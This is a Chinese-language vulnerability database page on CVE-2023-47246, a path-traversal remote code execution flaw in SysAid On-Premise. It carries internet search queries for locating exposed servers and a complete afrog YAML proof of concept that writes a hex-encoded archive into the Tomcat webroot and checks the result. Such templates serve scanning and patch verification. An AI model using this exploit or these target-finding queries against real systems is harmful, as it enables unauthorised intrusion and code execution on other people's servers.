CVE-2023-47246: SysAid-On-premise远程代码执行漏洞

日期: 2025-09-01 | 影响软件: SysAid On premise | POC: 已公开

漏洞描述

Sysaid Technologies SysAid是以色列Sysaid Technologies公司的一套IT服务管理解决方案。SysAid On-Premise是SysAid的本地安装版。 Sysaid Technologies SysAid On-Premise 23.3.36之前版本存在安全漏洞，该漏洞源于存在路径遍历漏洞。攻击者可利用的该漏洞将文件写入Tomcat webroot后执行代码。【影响版本】：SysAid On-premise < 23.3.36 Fofa：body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>" Shodan：http.favicon.hash:1540720428 Zoomeye：app:"SysAid On-Prem Software" Hunter：favicon_hash="5f30870725d650d7377a134c74f41cfd"

PoC代码[已公开]

id: CVE-2023-47246

info: 
  name: SysAid-On-premise远程代码执行漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    Sysaid Technologies SysAid是以色列Sysaid Technologies公司的一套IT服务管理解决方案。SysAid On-Premise是SysAid的本地安装版。
    Sysaid Technologies SysAid On-Premise 23.3.36之前版本存在安全漏洞，该漏洞源于存在路径遍历漏洞。攻击者可利用的该漏洞将文件写入Tomcat webroot后执行代码。
    【影响版本】：SysAid On-premise < 23.3.36
    Fofa：body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
    Shodan：http.favicon.hash:1540720428
    Zoomeye：app:"SysAid On-Prem Software"
    Hunter：favicon_hash="5f30870725d650d7377a134c74f41cfd"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47246
    - https://github.com/W01fh4cker/CVE-2023-47246-EXP
    - https://xz.aliyun.com/t/13090
  tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive
  created: 2023/12/06

set:
  randomdir: randomLowercase(4)
  hexbody: hexdecode("789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb")

rules:
  r0: 
    request:
      method: POST 
      path: /userentry?accountId=/../../../tomcat/webapps/{{randomdir}}/&symbolName=test&base64UserName=YWRtaW4=
      body: "{{hexbody}}"
    expression: response.status == 200
  r1: 
    before_sleep: 9
    request:
      method: GET 
      path: /{{randomdir}}/CVE-2023-47246.txt
    expression: |
      response.status == 200 &&
      response.body.bcontains(b"CVE_TEST")
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-47246.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

PrestaShop /module/askforaquote/QuotesCart SQL 注入漏洞（CVE-2023-27843） 无POC

Fujitsu IP Series 权限绕过漏洞（CVE-2023-38433） 无POC

通达OA delete_seal.php SQL 注入漏洞（CVE-2023-4165） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC

PrestaShop /module/askforaquote/QuotesCart SQL 注入漏洞（CVE-2023-27843）无POC

Fujitsu IP Series 权限绕过漏洞（CVE-2023-38433）无POC

通达OA delete_seal.php SQL 注入漏洞（CVE-2023-4165）无POC